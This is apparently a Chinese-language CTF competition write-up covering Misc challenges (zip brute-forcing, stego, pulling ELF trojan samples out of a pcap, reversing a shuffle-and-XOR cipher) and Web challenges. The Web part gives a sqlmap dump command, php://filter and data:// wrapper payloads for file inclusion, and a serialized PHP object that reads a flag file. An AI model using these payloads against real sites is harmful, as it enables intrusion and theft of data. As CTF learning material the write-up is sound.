本文最后更新于 159 天前,其中的信息可能已经有所发展或是发生改变。
Misc
zip
- 根据压缩包注释,猜测字符集为01的密码,长度
1-9,爆破得到flag
SimpleDocument
foremost分离文件,得到一个pdf,直接Ctrl+A,Ctrl+C
BeautifulImage
- LSB隐写,base64隐写
hacker_traffic
- 直接对分离文件,得到带有注释的压缩包
- password is (md5(virus_file) + lhost_ip)
- 存在大量ELF木马文件
- 写个脚本全部提取
a = open("hacker_traffic.pcapng", 'rb').read()
a = a.hex()
b = [16055, 55019, 92151, 129283, 166415, 203547, 240679, 277811, 314943, 352075, 389207, 426339, 463471, 500603, 537735, 574867, 611999, 649131, 686263, 723395, 760527, 797659, 839291, 876423, 913555, 950687, 987819, 1024951, 1062083, 1099215, 1136347, 1173479, 1210611, 1247743, 1284875, 1322007, 1359139, 1396271, 1433403, 1470535, 1507667, 1544799, 1581931, 1619063, 1656195, 1693327, 1730459, 1767591, 1804723, 1841855, 1878987, 1916119, 1953251, 1990383, 2027515, 2064647, 2101779, 2138911, 2176043, 2213175, 2250307, 2287567, 2324699, 2361959, 2399091, 2436223, 2473355, 2510487, 2547619, 2584751, 2621883, 2659015, 2696147, 2733279, 2770411, 2807543, 2844675, 2881807, 2918939, 2956071, 2993203, 3030335, 3067467, 3104599, 3141731, 3178863, 3215995, 3253127, 3290259, 3327391, 3364523, 3401655, 3438787, 3475919, 3513051, 3550183, 3587315, 3624447, 3661579, 3698711]
for i in b:
open(f"test/{i}", "wb").write(bytes.fromhex(a[i * 2:i * 2 +33792]))- 发现一个ip地址,运行一下抓个包,判断此地址就是
lhost
- 接下来算MD5,发现值不对,可能是结尾有多的东西,写个脚本生成个字典
from hashlib import md5
a = open('2287567', 'rb').read()
# for i in range(len(a))
file = open('test.txt', 'a')
for i in range(len(a)):
file.write(md5(a[:-i]).hexdigest() + '192.168.3.201\n')
- 解压得到加密脚本
from flag import secret
key = "x.x.x.x"
def encrypt_flag(flag, key):
random.seed(key)
table = list(range(0, 38))
random.shuffle(table)
flag = [flag[i] for i in table]
ascii_flag = [ord(c) for c in flag]
random.seed(key)
xor_key = random.randint(0, 255)
encrypted_flag = [c ^ xor_key for c in ascii_flag]
return base64.b64encode(bytes(encrypted_flag)).decode("ascii")
print(encrypt_flag(flag, key))
# VFVWU1kGBgIMUlMBVFcBBgRRBFAHVFBVUFkbUB0DAQMEBVIGAlE=- 写个解密脚本
import base64
def decrypt(t):
flag = base64.b64decode(t).decode("ascii")
xor_key = 96
ascii_flag = [ord(c) for c in flag]
encrypted_flag = ''.join([chr(c ^ xor_key) for c in ascii_flag])
table = [25, 28, 7, 24, 5, 0, 33, 21, 1, 31, 29, 2, 18, 27, 19, 13, 22, 9, 30, 10, 3, 11, 35, 15, 20, 16, 4, 23, 37, 36, 17, 32, 6, 34, 8, 26, 14, 12]
a = [i for i in range(38)]
for i in range(38):
a[table[i]] = encrypted_flag[i]
print(''.join(a))
decrypt("VFVWU1kGBgIMUlMBVFcBBgRRBFAHVFBVUFkbUB0DAQMEBVIGAlE=".encode())Web
Query
sqlmap一把梭
python sqlmap.py -u http://62be1f5b518e59a9.node.nsctf.cn/login.php --data="username=admin&password=admin" -D ctf -T f111 --dump --batch
codecheck
<!--
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{
die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{
die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{
die("NONONO");
}
if(isset($_GET['d']))
{
include($_GET['d']);
}-->- payload
?a=data://text/plain;base64,ZmxhZw==&b=php://filter/read=convert.base64-encode/resource=index.php&c=a&d=aDeserialization
- 读取
route.php - read=php://filter/read=convert.base64-encode/resource=route.php&input=1
- read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1
- read=h1nt.php&input=O:4:”test”:1:{s:8:”position”;s:57:”php://filter/read=convert.base64-encode/resource=f14g.php”;}
